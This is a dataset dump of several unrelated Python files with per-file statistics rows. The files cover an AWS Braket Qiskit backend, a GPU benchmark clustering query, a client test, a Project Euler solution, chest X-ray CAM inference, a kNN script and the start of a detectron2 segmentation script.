file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does already exist in the bucket {used_s3_bucket}")
result = s3_client.put_object(Body=json.dumps(task_arns).encode(), Bucket=used_s3_bucket, Key=file)
# TODO: error handling
return used_s3_bucket, self._get_job_data_s3_folder(job_id=job_id)
def _delete_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None):
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
def _load_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None) -> List[str]:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
streaming_body: StreamingBody = result['Body']
data: bytes = streaming_body.read()
task_arns = json.loads(data.decode())
return task_arns
def _save_job_data_s3(self, qobj: QasmQobj, s3_bucket: Optional[str] = None,
extra_data: Optional[dict] = None) -> AwsSession.S3DestinationFolder:
used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=qobj.qobj_id)}/qiskit_qobj_data.json'
if AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' already exists at the bucket {used_s3_bucket}")
body = {
'qobj_id': qobj.qobj_id,
'qobj': qobj.to_dict()
}
if extra_data:
body['extra_data'] = extra_data
result = s3_client.put_object(Body=json.dumps(body).encode(), Bucket=used_s3_bucket, Key=file)
# TODO: error handling
return used_s3_bucket, self._get_job_data_s3_folder(job_id=qobj.qobj_id)
def _delete_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None):
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
def _load_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None) -> Tuple[QasmQobj, dict]:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json'
if not AWSBackend._exists_file(s3_client, used_s3_bucket, file):
raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}")
result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file)
# TODO: error handling
streaming_body: StreamingBody = result['Body']
data: bytes = streaming_body.read()
stored_experiment_data = json.loads(data.decode())
assert 'qobj' in stored_experiment_data
qobj_raw = stored_experiment_data['qobj']
qobj = QasmQobj.from_dict(qobj_raw)
extra_data = stored_experiment_data.get('extra_data', {})
return qobj, extra_data
def _create_task(self, job_id: str, qc: Circuit, shots: int, s3_bucket: Optional[str] = None) -> AwsQuantumTask:
used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket()
task: AwsQuantumTask = self._aws_device.run(
task_specification=qc,
s3_destination_folder=(used_s3_bucket, self._get_job_data_s3_folder(job_id)),
shots=shots
)
return task
def jobs(
self,
limit: int = 10,
skip: int = 0,
status: Optional[Union[JobStatus, str, List[Union[JobStatus, str]]]] = None,
job_name: Optional[str] = None,
start_datetime: Optional[datetime] = None,
end_datetime: Optional[datetime] = None,
job_tags: Optional[List[str]] = None,
job_tags_operator: Optional[str] = "OR",
descending: bool = True,
db_filter: Optional[Dict[str, Any]] = None
) -> List['awsjob.AWSJob']:
# TODO: use job tags as meta data on s3, else use the method of active_jobs
pass
def active_jobs(self, limit: int = 10) -> List['awsjob.AWSJob']:
client = self._provider._aws_session.braket_client
task_arns = []
nextToken = 'init'
while nextToken is not None:
result: dict = client.search_quantum_tasks(
filters=[{
'name': self.name(),
'operator': 'EQUAL',
'values': ['CREATED', 'QUEUED', 'RUNNING']
}
],
maxResults=limit,
nextToken=None if nextToken == 'init' or nextToken is None else nextToken
)
# TODO: build all task_arns, query s3 for all keys with task_arns.json, see to which task a job associated, load the jobs via job_id
pass
def retrieve_job(self, job_id: str, s3_bucket: Optional[str] = None) -> 'awsjob.AWSJob':
qobj, extra_data = self._load_job_data_s3(job_id=job_id, s3_bucket=s3_bucket)
arns = self._load_job_task_arns(job_id=job_id, s3_bucket=s3_bucket)
tasks = [AwsQuantumTask(arn=arn) for arn in arns]
job = awsjob.AWSJob(
job_id=job_id,
qobj=qobj,
tasks=tasks,
extra_data=extra_data,
s3_bucket=s3_bucket,
backend=self
)
return job
def estimate_costs(self, qobj: QasmQobj) -> Optional[float]:
shots = qobj.config.shots
no_experiments = len(qobj.experiments)
cost: DeviceCost = self._aws_device.properties.service.deviceCost
if cost.unit == 'shot':
return shots * no_experiments * cost.price
elif cost.unit == 'hour':
time_per_experiment = timedelta(seconds=10) # TODO: make this a better estimate: depends on no_qubits and depth
total_time = shots * no_experiments * time_per_experiment
return total_time.total_seconds() / 60 / 60 * cost.price
else:
return None
def run(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = None):
# If we get here, then we can continue with running, else ValueError!
circuits: List[Circuit] = list(convert_qasm_qobj(qobj))
shots = qobj.config.shots
tasks: List[AwsQuantumTask] = []
try:
s3_location: AwsSession.S3DestinationFolder = self._save_job_data_s3(qobj, s3_bucket=s3_bucket, extra_data=extra_data)
for circuit in circuits:
task = self._aws_device.run(
task_specification=circuit,
s3_destination_folder=s3_location,
shots=shots
)
tasks.append(task)
task_arns = [t.id for t in tasks]
self._save_job_task_arns(job_id=qobj.qobj_id, task_arns=task_arns, s3_bucket=s3_location[0])
except Exception as ex:
logger.error(f'During creation of tasks an error occurred: {ex}')
logger.error(f'Cancelling all tasks {len(tasks)}!')
for task in tasks:
logger.error(f'Attempt to cancel {task.id}...')
task.cancel()
logger.error(f'State of {task.id}: {task.state()}.')
self._delete_job_task_arns(qobj.qobj_id, s3_bucket=s3_bucket)
self._delete_job_data_s3(qobj.qobj_id, s3_bucket=s3_bucket)
raise ex
job = awsjob.AWSJob(
job_id=qobj.qobj_id,
qobj=qobj,
tasks=tasks,
extra_data=extra_data,
s3_bucket=s3_location[0],
backend=self
)
return job
| 45.138889
| 144
| 0.666923
| 1,664
| 13,000
| 4.918269
| 0.16887
| 0.058651
| 0.041056
| 0.026393
| 0.417155
| 0.377199
| 0.353495
| 0.34433
| 0.31085
| 0.306574
| 0
| 0.014246
| 0.244077
| 13,000
| 287
| 145
| 45.296167
| 0.818561
| 0.089154
| 0
| 0.26009
| 0
| 0
| 0.098713
| 0.039197
| 0
| 0
| 0
| 0.003484
| 0.004484
| 1
| 0.076233
| false
| 0.008969
| 0.089686
| 0.004484
| 0.255605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe30812932f608889eaceef38afb76f593b3db27
| 3,830
|
py
|
Python
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 62
|
2020-05-14T13:33:02.000Z
|
2020-10-29T13:28:26.000Z
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 104
|
2020-07-01T21:07:42.000Z
|
2020-11-13T16:36:04.000Z
|
gpu_bdb/queries/q26/gpu_bdb_query_26.py
|
VibhuJawa/gpu-bdb
|
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
|
[
"Apache-2.0"
] | 21
|
2020-05-14T14:44:40.000Z
|
2020-11-07T12:08:28.000Z
|
#
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from bdb_tools.utils import (
benchmark,
gpubdb_argparser,
train_clustering_model,
run_query,
)
from bdb_tools.q26_utils import (
Q26_CATEGORY,
Q26_ITEM_COUNT,
N_CLUSTERS,
CLUSTER_ITERATIONS,
N_ITER,
read_tables
)
import numpy as np
from dask import delayed
def agg_count_distinct(df, group_key, counted_key):
"""Returns a Series that is the result of counting distinct instances of 'counted_key' within each 'group_key'.
The series' index will have one entry per unique 'group_key' value.
Workaround for lack of nunique aggregate function on Dask df.
"""
return (
df.drop_duplicates([group_key, counted_key])
.groupby(group_key)[counted_key]
.count()
)
def get_clusters(client, kmeans_input_df):
import dask_cudf
ml_tasks = [
delayed(train_clustering_model)(df, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER)
for df in kmeans_input_df.to_delayed()
]
results_dict = client.compute(*ml_tasks, sync=True)
output = kmeans_input_df.index.to_frame().reset_index(drop=True)
labels_final = dask_cudf.from_cudf(
results_dict["cid_labels"], npartitions=output.npartitions
)
output["label"] = labels_final.reset_index()[0]
# Sort based on CDH6.1 q26-result formatting
output = output.sort_values(["ss_customer_sk"])
# Based on CDH6.1 q26-result formatting
results_dict["cid_labels"] = output
return results_dict
def main(client, config):
import cudf
ss_ddf, items_ddf = benchmark(
read_tables,
config=config,
compute_result=config["get_read_time"],
)
items_filtered = items_ddf[items_ddf.i_category == Q26_CATEGORY].reset_index(
drop=True
)
items_filtered = items_filtered[["i_item_sk", "i_class_id"]]
f_ss_ddf = ss_ddf[ss_ddf["ss_customer_sk"].notnull()].reset_index(drop=True)
merged_ddf = f_ss_ddf.merge(
items_filtered, left_on="ss_item_sk", right_on="i_item_sk", how="inner"
)
keep_cols = ["ss_customer_sk", "i_class_id"]
merged_ddf = merged_ddf[keep_cols]
# One-Hot-Encode i_class_id
merged_ddf = merged_ddf.map_partitions(
cudf.get_dummies,
columns=["i_class_id"],
prefix="id",
cats={"i_class_id": np.arange(1, 16, dtype="int32")},
prefix_sep="",
dtype="float32",
)
merged_ddf["total"] = 1.0 # Will keep track of total count
all_categories = ["total"] + ["id%d" % i for i in range(1, 16)]
# Aggregate using agg to get sorted ss_customer_sk
agg_dict = dict.fromkeys(all_categories, "sum")
rollup_ddf = merged_ddf.groupby("ss_customer_sk").agg(agg_dict)
rollup_ddf = rollup_ddf[rollup_ddf.total > Q26_ITEM_COUNT][all_categories[1:]]
# Prepare data for KMeans clustering
rollup_ddf = rollup_ddf.astype("float64")
kmeans_input_df = rollup_ddf.persist()
results_dict = get_clusters(client=client, kmeans_input_df=kmeans_input_df)
return results_dict
if __name__ == "__main__":
from bdb_tools.cluster_startup import attach_to_cluster
config = gpubdb_argparser()
client, bc = attach_to_cluster(config)
run_query(config=config, client=client, query_func=main)
| 31.138211
| 115
| 0.703655
| 549
| 3,830
| 4.621129
| 0.380692
| 0.024832
| 0.030745
| 0.021285
| 0.076074
| 0.069373
| 0.044935
| 0
| 0
| 0
| 0
| 0.014984
| 0.198433
| 3,830
| 122
| 116
| 31.393443
| 0.811401
| 0.268407
| 0
| 0.026316
| 0
| 0
| 0.07709
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.092105
| 0
| 0.171053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3188f73830a0839c72948677e1605c9ae2ae83
| 1,586
|
py
|
Python
|
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | 2
|
2019-02-22T11:56:17.000Z
|
2019-02-25T10:09:46.000Z
|
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | null | null | null |
tdclient/test/database_model_test.py
|
minchuang/td-client-python
|
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
try:
from unittest import mock
except ImportError:
import mock
from tdclient import models
from tdclient.test.test_helper import *
def setup_function(function):
unset_environ()
def test_database():
client = mock.MagicMock()
database = models.Database(client, "sample_datasets", tables=["nasdaq", "www_access"], count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator")
assert database.org_name == "org_name"
assert database.permission == "administrator"
assert database.count == 12345
assert database.name == "sample_datasets"
assert database.tables() == ["nasdaq", "www_access"]
assert database.created_at == "created_at"
assert database.updated_at == "updated_at"
def test_database_update_tables():
client = mock.MagicMock()
client.tables = mock.MagicMock(return_value=[
models.Table(client, "sample_datasets", "foo", "type", "schema", "count"),
models.Table(client, "sample_datasets", "bar", "type", "schema", "count"),
models.Table(client, "sample_datasets", "baz", "type", "schema", "count"),
])
database = models.Database(client, "sample_datasets", tables=None, count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator")
tables = database.tables()
assert [ table.name for table in tables ] == ["foo", "bar", "baz"]
client.tables.assert_called_with("sample_datasets")
| 40.666667
| 202
| 0.713745
| 193
| 1,586
| 5.621762
| 0.295337
| 0.090323
| 0.092166
| 0.04977
| 0.354839
| 0.326267
| 0.326267
| 0.237788
| 0.152995
| 0.152995
| 0
| 0.011095
| 0.147541
| 1,586
| 38
| 203
| 41.736842
| 0.79142
| 0.01261
| 0
| 0.064516
| 0
| 0
| 0.20639
| 0
| 0
| 0
| 0
| 0
| 0.290323
| 1
| 0.096774
| false
| 0
| 0.225806
| 0
| 0.322581
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe31f26debb52795b22561b36355ce06ff7905d8
| 558
|
py
|
Python
|
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
setup.py
|
ballcap231/fireTS
|
74cc89a14d67edabf31139d1552025d54791f2a9
|
[
"MIT"
] | null | null | null |
from setuptools import setup
dependencies = [
'numpy',
'scipy',
'scikit-learn',
]
setup(
name='fireTS',
version='0.0.7',
description='A python package for multi-variate time series prediction',
long_description=open('README.md').read(),
long_description_content_type="text/markdown",
url='https://github.com/jxx123/fireTS.git',
author='Jinyu Xie',
author_email='xjygr08@gmail.com',
license='MIT',
packages=['fireTS'],
install_requires=dependencies,
include_package_data=True,
zip_safe=False)
| 24.26087
| 76
| 0.677419
| 67
| 558
| 5.507463
| 0.835821
| 0.081301
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017429
| 0.177419
| 558
| 22
| 77
| 25.363636
| 0.786492
| 0
| 0
| 0
| 0
| 0
| 0.327957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3273d41978521818a7243089a132072ef92c5a
| 883
|
py
|
Python
|
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
euler/py/project_019.py
|
heyihan/scodes
|
342518b548a723916c9273d8ebc1b345a0467e76
|
[
"BSD-3-Clause"
] | null | null | null |
# https://projecteuler.net/problem=19
def is_leap(year):
if year%4 != 0:
return False
if year%100 == 0 and year%400 != 0:
return False
return True
def year_days(year):
if is_leap(year):
return 366
return 365
def month_days(month, year):
if month == 4 or month == 6 or month == 9 or month == 11:
return 30
if month == 2:
if is_leap(year):
return 29
return 28
return 31
day_19000101 = 1
days_1900 = year_days(1900)
day_next_day1 = (day_19000101 + days_1900)%7
print(day_19000101, days_1900, day_next_day1)
sum = 0
for i in range(1901, 2001):
for j in range(1, 13):
if day_next_day1 == 0:
print(i, j)
sum = sum + 1
days = month_days(j, i)
day_next_day1 = (day_next_day1 + days)%7
#print(i, j, days, day_next_day1)
print(sum)
| 20.534884
| 61
| 0.582106
| 142
| 883
| 3.443662
| 0.338028
| 0.08589
| 0.134969
| 0.04908
| 0.151329
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156507
| 0.312571
| 883
| 42
| 62
| 21.02381
| 0.649094
| 0.075878
| 0
| 0.129032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0
| 0
| 0.387097
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3415df5ab13d93fe351122344f2bd2d2fe4c5f
| 3,839
|
py
|
Python
|
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | null | null | null |
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | 11
|
2020-01-28T21:44:26.000Z
|
2022-03-11T23:19:37.000Z
|
inference.py
|
zzhang87/ChestXray
|
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
|
[
"MIT"
] | null | null | null |
import keras
import numpy as np
import pandas as pd
import cv2
import os
import json
import pdb
import argparse
import math
import copy
from vis.visualization import visualize_cam, overlay, visualize_activation
from vis.utils.utils import apply_modifications
from shutil import rmtree
import matplotlib.cm as cm
from matplotlib import pyplot as plt
from sklearn import metrics
import keras.backend as K
from keras import activations
from keras.applications.inception_v3 import preprocess_input as inception_pre
from keras.applications.mobilenet import preprocess_input as mobilenet_pre
from keras.applications.resnet50 import preprocess_input as resnet_pre
from keras.applications.densenet import preprocess_input as densenet_pre
from datagenerator import ImageDataGenerator
from utils import load_model
def getCAM(model, image):
# weights of the final fully-connected layer
weights = model.layers[-1].get_weights()[0]
# activation before the last global pooling
for layer in reversed(model.layers):
if len(layer.output_shape) > 2:
break
function = K.function([model.layers[0].input, K.learning_phase()], [layer.output])
activation = np.squeeze(function([image, 0])[0])
# weighted sum of the activation map
CAM = np.dot(activation, weights)
return CAM
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--ckpt_path', help = 'Path to the model checkpoint.')
ap.add_argument('--image_path', help = 'Path to the image to run inference on.')
ap.add_argument('--bnbox', help = 'Path to the bounding box annotation, if applies.')
ap.add_argument('--threshold', default = 0.5, help = 'Threshold for displaying the Class Activation Map.')
args = ap.parse_args()
model_dir = os.path.dirname(args.ckpt_path)
with open(os.path.join(model_dir, 'label_map.json'), 'r') as f:
label_map = json.load(f)
num_class = len(list(label_map.keys()))
model, model_config = load_model(model_dir, args.ckpt_path)
model_name = model_config['model_name']
if model_name in ['inception']:
image_size = 299
else:
image_size = 224
preprocess_input = {
'inception': inception_pre,
'resnet': resnet_pre,
'mobilenet': mobilenet_pre,
'densenet': densenet_pre
}
if args.bnbox is not None:
annotation = pd.read_csv(args.bnbox)
image_index = os.path.basename(args.image_path)
indices = np.where(annotation['Image Index'] == image_index)[0]
bnbox = {}
for i in indices:
disease = annotation['Finding Label'][i]
x = int(annotation['Bbox [x'][i] + 0.5)
y = int(annotation['y'][i] + 0.5)
w = int(annotation['w'][i] + 0.5)
h = int(annotation['h]'][i] + 0.5)
bnbox[disease] = [x, y, x + w, y + h]
image = cv2.imread(args.image_path)
img = cv2.resize(image, (image_size, image_size))
img = preprocess_input[model_name](img.astype(np.float32))
img = np.expand_dims(img, axis = 0)
predictions = np.squeeze(model.predict(img))
CAM = getCAM(model, img)
cv2.namedWindow("ChestXray", cv2.WINDOW_NORMAL)
for key, value in label_map.items():
heatmap = CAM[:,:,int(key)]
heatmap -= heatmap.min()
heatmap *= 255.0 / heatmap.max()
heatmap[np.where(heatmap < args.threshold * 255)] *= 0.1
heatmap = cv2.applyColorMap(heatmap.astype(np.uint8), cv2.COLORMAP_JET)
heatmap = cv2.resize(heatmap, image.shape[:2], cv2.INTER_AREA)
overlay_img = overlay(heatmap, image, alpha = 0.4)
cv2.putText(overlay_img, "{}: {:.2%}".format(value, predictions[int(key)]),
(30,30), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255,255,255), 2)
if value in bnbox.keys():
box = bnbox[value]
cv2.rectangle(overlay_img, (box[0], box[1]), (box[2], box[3]),
color = (0, 180, 0), thickness = 2)
cv2.imshow("ChestXray", overlay_img)
cv2.waitKey()
plt.show()
print('{}: {:.2%}'.format(value, predictions[int(key)]))
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 27.035211
| 107
| 0.716593
| 572
| 3,839
| 4.681818
| 0.332168
| 0.033607
| 0.031367
| 0.034354
| 0.034354
| 0.021658
| 0
| 0
| 0
| 0
| 0
| 0.025962
| 0.147174
| 3,839
| 142
| 108
| 27.035211
| 0.791998
| 0.030998
| 0
| 0
| 0
| 0
| 0.094969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.25
| 0
| 0.28125
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe34376d96d5593399f4f9364cf5da83ea7d813b
| 530
|
py
|
Python
|
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
test/DQueueTest.py
|
MistSun-Chen/py_verifier
|
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
|
[
"MIT"
] | null | null | null |
from libTask import Queue
from common import configParams
from common import common
def main():
cp = configParams.ConfigParams("config.json")
detectGeneralQueue = Queue.DQueue(cp, len(cp.detect_general_ids), cp.modelPath, common.GENERALDETECT_METHOD_ID,
cp.GPUDevices, cp.detect_general_ids)
print("Run Into Next step")
smokeQueue = Queue.DQueue(cp, len(cp.smoke_ids), cp.modelPath, common.PEOPLESMOKE_METHOD_ID,cp.GPUDevices, cp.smoke_ids)
if __name__ == '__main__':
main()
| 35.333333
| 124
| 0.718868
| 68
| 530
| 5.338235
| 0.470588
| 0.055096
| 0.088154
| 0.088154
| 0.220386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181132
| 530
| 15
| 125
| 35.333333
| 0.836406
| 0
| 0
| 0
| 0
| 0
| 0.06968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.363636
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3599447ec843cd5c9296bccc205dff470707c7
| 1,417
|
py
|
Python
|
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | null | null | null |
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | 2
|
2018-03-20T06:47:32.000Z
|
2018-10-25T10:54:08.000Z
|
src/Knn-Tensor.py
|
python-itb/knn-from-scratch
|
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
|
[
"MIT"
] | 4
|
2018-03-20T06:43:11.000Z
|
2019-04-15T16:34:28.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 13 18:52:28 2018
@author: amajidsinar
"""
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
plt.style.use('seaborn-white')
iris = datasets.load_iris()
dataset = iris.data
# only take 0th and 1th column for X
data_known = iris.data[:,:2]
# y
label_known = iris.target
# the hard part
# so matplotlib does not readily support labeling based on class
# but we know that one of the feature of plt is that a plt call would give those set of number
# the same color
category = np.unique(label_known)
for i in category:
plt.scatter(data_known[label_known==i][:,0],data_known[label_known==i][:,1],label=i)
# Unknown class of a data
data_unknown = np.array([[5.7,3.3],[5.6,3.4],[6.4,3],[8.2,2.2]])
plt.scatter(data_unknown[:,0],data_unknown[:,1], label='?')
plt.legend()
#-------------
# Euclidean Distance
diff = data_known - data_unknown.reshape(data_unknown.shape[0],1,data_unknown.shape[1])
distance = (diff**2).sum(2)
#return sorted index of distance
dist_index = np.argsort(distance)
label = label_known[dist_index]
#for k in [1,2,3,4,5,6,7,8,9,10]:
#keep the rank
k = 10
label = label[:,:k]
label_predict = []
for i in range(data_unknown.shape[0]):
values,counts = np.unique(label[i], return_counts=True)
ind = np.argmax(counts)
label_predict.append(values[ind])
| 21.149254
| 94
| 0.687368
| 244
| 1,417
| 3.901639
| 0.47541
| 0.080882
| 0.05042
| 0.039916
| 0.042017
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046025
| 0.156669
| 1,417
| 66
| 95
| 21.469697
| 0.750628
| 0.321101
| 0
| 0
| 0
| 0
| 0.014941
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.12
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe35a3606e5ec595f8753af44fd793743da1ae33
| 2,135
|
py
|
Python
|
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
de_test_tron2.py
|
volpepe/detectron2-ResNeSt
|
1481d50880baa615b873b7a18156c06a5606a85c
|
[
"Apache-2.0"
] | null | null | null |
import torch, torchvision
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import os, json, cv2, random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog, DatasetCatalog
import argparse, time
def parse_args():
p = argparse.ArgumentParser()
p.add_argument("-i", "--image", type=str, help="Path to image to segment")
p.add_argument("-m", "--model", type=str, help="Model to use", default="COCO-InstanceSegmentation/mask_cascade_rcnn_ResNeSt_200_FPN_syncBN_all_tricks_3x.yaml")
p.add_argument("-t", "--threshold", type=float, help="Threshold for model detections", default=0.4)
p.add_argument("-rs", "--use_resnest", type=bool, help="Whether the selected model uses ResNeSt backbone or no", default=True)
return p.parse_args()
def start_segment(args):
img = args.image
model = args.model
thresh = args.threshold
use_resnest = args.use_resnest
im = cv2.imread(img)
# get default cfg file
cfg = get_cfg()
# replace cfg from specific model yaml file
cfg.merge_from_file(model_zoo.get_config_file(model))
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh # set threshold for this model
